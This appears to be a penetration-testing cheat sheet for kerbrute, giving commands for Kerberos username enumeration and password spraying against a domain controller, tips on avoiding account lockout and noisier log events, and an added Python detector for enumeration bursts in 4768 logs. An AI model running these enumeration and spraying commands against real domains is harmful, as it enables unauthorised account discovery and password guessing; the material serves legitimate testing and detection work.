kerbrute

kerbrute (2.4k ⭐, 2020 🪦) is a popular tool that can be used for username enumeration and for password spraying on Kerberos.

You can install it using:

$ go install github.com/ropnop/kerbrute@latest

Username enumeration 🧑: it uses Kerberos Pre-Authentication to perform its enumeration. It generates event code 4768 (TGT request) instead of 4625 (login failure). It doesn't count towards account lockout.

$ kerbrute userenum -d domain --dc IP wordlist
$ kerbrute userenum -d domain --dc IP wordlist -o output.txt
$ grep + output.txt | cut -d ' ' -f8 | cut -d '@' -f1 > valid_users.txt

📚 If a user does not require pre-authentication, their hash may be dumped, though we may have to investigate it manually. Refer to AS-REP Roasting Attack.
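
A defender-side check for the behaviour described above, as an added example that is not part of the original page or of kerbrute: because enumeration shows up as 4768 events rather than 4625, it flags any source that requests TGTs for many distinct accounts within a short window. The event tuple layout, the sample data and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def sample_events():
    """Constructed sample events (not real logs): (timestamp, event_id, source_ip, account)."""
    base = datetime(2024, 1, 1, 9, 0, 0)
    events = []
    # One host requesting TGTs for 30 different account names in about six seconds.
    for i in range(30):
        events.append((base + timedelta(milliseconds=200 * i), 4768, "10.0.0.50", f"user{i}"))
    # Ordinary workstation: the same user obtaining a TGT a few times.
    for i in range(3):
        events.append((base + timedelta(minutes=i), 4768, "10.0.0.21", "alice"))
    # A 4625 logon failure; this rule ignores it, since the enumeration does not produce 4625.
    events.append((base, 4625, "10.0.0.33", "bob"))
    return events

def find_enumeration_sources(events, window=timedelta(seconds=60), min_accounts=20):
    """Return {source_ip: peak distinct accounts} for sources whose 4768 events
    cover at least min_accounts distinct accounts inside one sliding window."""
    by_source = defaultdict(list)
    for ts, event_id, src, account in events:
        if event_id == 4768:
            by_source[src].append((ts, account.lower()))
    flagged = {}
    for src, reqs in by_source.items():
        reqs.sort()
        counts = defaultdict(int)  # account -> occurrences currently inside the window
        start = 0
        peak = 0
        for ts, account in reqs:
            counts[account] += 1
            # Evict requests that have fallen out of the window ending at ts.
            while ts - reqs[start][0] > window:
                old = reqs[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            peak = max(peak, len(counts))
        if peak >= min_accounts:
            flagged[src] = peak
    return flagged

if __name__ == "__main__":
    print(find_enumeration_sources(sample_events()))
```
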

Password Spraying

$ kerbrute passwordspray -d domain --dc IP valid_users.txt mypassword
<may not work, use nxc/cme instead>